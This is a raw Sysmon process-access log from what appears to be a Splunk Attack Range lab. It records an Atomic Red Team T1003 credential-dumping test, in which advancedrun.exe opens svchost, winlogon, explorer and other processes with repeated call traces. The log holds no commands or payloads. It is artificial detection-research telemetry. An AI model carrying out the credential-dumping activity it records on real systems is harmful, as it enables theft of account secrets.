17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980193Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980192Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980191Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980190Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980189Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980188Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980187Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980186Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980185Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980184Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980183Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980182Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003980180Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980179Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980178Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980177Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 